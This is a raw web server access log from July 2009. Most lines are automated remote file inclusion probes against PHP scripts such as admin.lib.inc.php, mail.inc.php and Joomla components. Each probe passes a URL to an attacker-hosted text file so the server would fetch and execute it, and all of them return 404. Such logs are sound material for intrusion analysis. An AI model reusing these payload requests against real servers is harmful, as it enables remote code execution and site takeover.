124.0.139.129 - - [16/Jul/2009:03:03:14 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:03:15 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:03:03:20 -0400] "GET /logs/access_log.Q109062900%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:03:03:21 -0400] "GET /logs/access_log.Q109061900%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:03:22 -0400] "GET //include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:03:22 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:03:22 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:03:22 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:03:23 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.172.33.230 - - [16/Jul/2009:03:03:36 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.812"
209.172.33.230 - - [16/Jul/2009:03:03:36 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 219 "-" "libwww-perl/5.812"
209.172.33.230 - - [16/Jul/2009:03:03:36 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 224 "-" "libwww-perl/5.812"
117.74.99.225 - - [16/Jul/2009:03:03:39 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
117.74.99.225 - - [16/Jul/2009:03:03:39 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
117.74.99.225 - - [16/Jul/2009:03:03:39 -0400] "GET /logs/access_log.Q109061900%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
209.172.33.230 - - [16/Jul/2009:03:03:40 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.812"
124.0.139.129 - - [16/Jul/2009:03:04:02 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:04:02 -0400] "GET //include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:04:02 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:04:02 -0400] "GET /logs/access_log.Q109070800%20%20//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:03:04:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.30.180.2 - - [16/Jul/2009:03:05:09 -0400] "GET /logs/access_log.Q109061100/http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
65.55.105.234 - - [16/Jul/2009:03:05:37 -0400] "GET /logs/access_log.Q107122400 HTTP/1.1" 404 224 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
209.172.33.230 - - [16/Jul/2009:03:06:05 -0400] "GET /logs/error_log.Q109060300%20//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.812"
209.172.33.230 - - [16/Jul/2009:03:06:05 -0400] "GET /logs/access_log.Q109070300%20//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.812"
201.232.54.48 - - [16/Jul/2009:03:06:22 -0400] "GET /logs/access_log.Q109052300/index1.php?site=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [16/Jul/2009:03:06:22 -0400] "GET /index1.php?site=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.232.54.48 - - [16/Jul/2009:03:06:22 -0400] "GET /logs/index1.php?site=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
114.200.199.144 - - [16/Jul/2009:03:07:06 -0400] "GET /logs/access_log.Q109050700%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.227.193.198 - - [16/Jul/2009:03:07:47 -0400] "GET /logs/access_log.Q109061600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.227.193.198 - - [16/Jul/2009:03:07:52 -0400] "GET /logs/access_log.Q109053100/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
193.33.21.12 - - [16/Jul/2009:03:08:09 -0400] "GET /logs/access_log.Q109050900/http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
98.116.62.213 - - [16/Jul/2009:03:08:10 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
98.116.62.213 - - [16/Jul/2009:03:08:10 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
98.116.62.213 - - [16/Jul/2009:03:08:10 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:03:08:10 -0400] "GET /logs/access_log.Q109051600%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:03:08:15 -0400] "GET /logs/access_log.Q109070800%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:03:09:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
98.116.62.213 - - [16/Jul/2009:03:09:13 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:03:09:23 -0400] "GET /logs/access_log.Q109061900%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:03:11:36 -0400] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.822"
76.12.17.218 - - [16/Jul/2009:03:11:36 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.822"
76.12.17.218 - - [16/Jul/2009:03:11:36 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.822"
76.12.17.218 - - [16/Jul/2009:03:11:36 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.822"
211.230.156.161 - - [16/Jul/2009:03:11:56 -0400] "GET /logs/access_log.Q109062900%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:03:12:13 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:03:12:45 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:03:12:45 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:03:12:45 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:03:12:45 -0400] "GET /logs/access_log.Q109061000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:03:13:28 -0400] "GET /logs/access_log.Q109070700%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.822"
217.30.180.2 - - [16/Jul/2009:03:13:46 -0400] "GET /logs/access_log.Q109061100/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
211.236.242.164 - - [16/Jul/2009:03:13:51 -0400] "GET /errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:03:13:52 -0400] "GET /logs/errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:03:13:52 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:03:13:54 -0400] "GET /logs/errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:03:13:54 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:03:13:54 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:03:13:54 -0400] "GET /errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:03:13:54 -0400] "GET /logs/errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:03:13:54 -0400] "GET /errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
193.151.16.53 - - [16/Jul/2009:03:13:56 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt?%0D?? HTTP/1.1" 404 242 "-" "libwww-perl/5.825"
193.151.16.53 - - [16/Jul/2009:03:13:56 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt?%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.825"
193.151.16.53 - - [16/Jul/2009:03:13:56 -0400] "GET /logs/access_log.Q109070700%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt?%0D?? HTTP/1.1" 404 270 "-" "libwww-perl/5.825"
217.30.180.2 - - [16/Jul/2009:03:14:22 -0400] "GET /logs/access_log.Q109062700/http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
209.59.12.99 - - [16/Jul/2009:03:14:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.236.242.164 - - [16/Jul/2009:03:14:43 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:03:14:43 -0400] "GET /errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:03:14:43 -0400] "GET /logs/errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:15:09 -0400] "GET //include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:15:09 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:15:09 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:15:17 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
193.151.16.53 - - [16/Jul/2009:03:15:32 -0400] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt?%0D?? HTTP/1.1" 404 269 "-" "libwww-perl/5.825"
211.236.242.164 - - [16/Jul/2009:03:15:34 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
193.151.16.53 - - [16/Jul/2009:03:15:35 -0400] "GET /logs/access_log.Q109071100//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt?%0D?? HTTP/1.1" 404 269 "-" "libwww-perl/5.825"
75.74.201.182 - - [16/Jul/2009:03:15:37 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C864C3C2475005571002+M37+ENG HTTP/1.1" 200 76286 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C8644345435003D11002+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1) Gecko/20090624 Firefox/3.5"
211.236.242.164 - - [16/Jul/2009:03:15:43 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
75.74.201.182 - - [16/Jul/2009:03:15:48 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C8D4C3DB4D500A2A1003+M37+ENG HTTP/1.1" 200 48337 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C864C3C2475005571002+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1) Gecko/20090624 Firefox/3.5"
211.236.242.164 - - [16/Jul/2009:03:16:05 -0400] "GET /logs/access_log.Q109051600/errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:17:31 -0400] "GET /errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:17:31 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:17:31 -0400] "GET /logs/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.249.68.70 - - [16/Jul/2009:03:17:48 -0400] "GET /images/items/index5_surgscis.jpg HTTP/1.1" 200 3404 "-" "Googlebot-Image/1.0"
65.254.32.2 - - [16/Jul/2009:03:17:50 -0400] "GET //include/write.php?dir=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
65.254.32.2 - - [16/Jul/2009:03:17:50 -0400] "GET /logs//include/write.php?dir=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
65.254.32.2 - - [16/Jul/2009:03:17:50 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
98.116.62.213 - - [16/Jul/2009:03:18:13 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
65.254.32.2 - - [16/Jul/2009:03:18:26 -0400] "GET /logs/access_log.Q109051800%20%20//include/write.php?dir=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:18:38 -0400] "GET /logs/access_log.Q109053000%20%20/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
98.116.62.213 - - [16/Jul/2009:03:18:38 -0400] "GET /logs/error_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
65.254.32.2 - - [16/Jul/2009:03:18:39 -0400] "GET /logs/access_log.Q109051300%20%20//include/write.php?dir=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:03:19:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.236.242.164 - - [16/Jul/2009:03:20:35 -0400] "GET /errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:03:20:35 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:03:20:39 -0400] "GET /logs/errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:03:20:49 -0400] "GET /errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:03:20:49 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:03:20:49 -0400] "GET /logs/errors.php?error=http://www.petechnologies.net//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.106.245.84 - - [16/Jul/2009:03:21:02 -0400] "GET //ashnews.php?pathtoashnews=http://business.cnu.ac.kr/~economics/file/bbs/rgboard/1.jpg? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
87.106.245.84 - - [16/Jul/2009:03:21:02 -0400] "GET /logs/access_log.Q109071100%20%20//ashnews.php?pathtoashnews=http://business.cnu.ac.kr/~economics/file/bbs/rgboard/1.jpg? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
87.106.245.84 - - [16/Jul/2009:03:21:02 -0400] "GET /logs//ashnews.php?pathtoashnews=http://business.cnu.ac.kr/~economics/file/bbs/rgboard/1.jpg? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
87.106.245.84 - - [16/Jul/2009:03:21:02 -0400] "GET /logs/error_log.Q109061000%20%20//ashnews.php?pathtoashnews=http://business.cnu.ac.kr/~economics/file/bbs/rgboard/1.jpg? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:21:33 -0400] "GET /errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:21:33 -0400] "GET /logs/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:21:34 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.200.199.144 - - [16/Jul/2009:03:21:38 -0400] "GET /logs/access_log.Q109061100%20%20//com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
114.200.199.144 - - [16/Jul/2009:03:21:38 -0400] "GET /logs//com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
114.200.199.144 - - [16/Jul/2009:03:21:38 -0400] "GET //com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.33.21.12 - - [16/Jul/2009:03:21:39 -0400] "GET /logs/access_log.Q109050900/contrib/yabbse/poc.php?sourcedir=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
63.147.72.145 - - [16/Jul/2009:03:22:15 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:03:22:15 -0400] "GET /logs/access_log.Q109061300%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:03:22:15 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:03:22:19 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:03:22:19 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:03:22:19 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:03:22:19 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:03:22:19 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:03:22:19 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:03:22:22 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:03:22:22 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:03:22:22 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:03:22:23 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:03:22:23 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:03:22:23 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:03:22:25 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
